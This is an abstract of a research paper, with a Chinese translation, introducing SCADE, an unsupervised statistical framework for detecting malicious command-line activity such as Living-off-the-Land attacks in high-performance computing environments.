As command-line interfaces remain integral to high-performance computing environments, the risk of exploitation through stealthy and complex command-line abuse grows. Conventional security solutions struggle to detect these anomalies due to their context-specific nature, lack of labeled data, and the prevalence of sophisticated attacks like Living-off-the-Land (LOL). To address this gap, we introduce the Scalable Command-Line Anomaly Detection Engine (SCADE), a framework that combines global statistical models with local context-specific analysis for unsupervised anomaly detection. SCADE leverages novel statistical methods, including BM25 and Log Entropy, alongside dynamic thresholding to adaptively detect rare, malicious command-line patterns in low signal-to-noise ratio (SNR) environments. Experimental results show that SCADE achieves above 98% SNR in identifying anomalous behavior while minimizing false positives. Designed for scalability and precision, SCADE provides an innovative, metadata-enriched approach to anomaly detection, offering a robust solution for cybersecurity in high-computation environments. This work presents SCADE's architecture, detection methodology, and its potential for enhancing anomaly detection in enterprise systems. We argue that SCADE represents a significant advancement in unsupervised anomaly detection, offering a robust, adaptive framework for security analysts and researchers seeking to enhance detection accuracy in high-computation environments.

翻译：随着命令行界面在高性能计算环境中持续发挥关键作用，通过隐蔽且复杂的命令行滥用进行攻击的风险日益增加。传统的安全解决方案由于攻击具有情境特定性、缺乏标记数据以及Living-off-the-Land（LOL）等复杂攻击的盛行，难以有效检测此类异常。为弥补这一不足，我们提出了可扩展命令行异常检测引擎（SCADE），该框架结合了全局统计模型与局部情境特定分析，用于无监督异常检测。SCADE利用新颖的统计方法（包括BM25与对数熵）及动态阈值技术，能够在低信噪比（SNR）环境中自适应地检测罕见且恶意的命令行模式。实验结果表明，SCADE在识别异常行为时能实现高于98%的信噪比，同时最大限度地降低误报率。SCADE专为可扩展性与精确性设计，提供了一种创新的、元数据增强的异常检测方法，为高计算环境下的网络安全提供了稳健的解决方案。本文阐述了SCADE的架构、检测方法及其在增强企业系统异常检测方面的潜力。我们认为，SCADE代表了无监督异常检测领域的重大进展，为安全分析师和研究人员提供了一个强大且自适应的框架，有助于提升高计算环境中的检测准确性。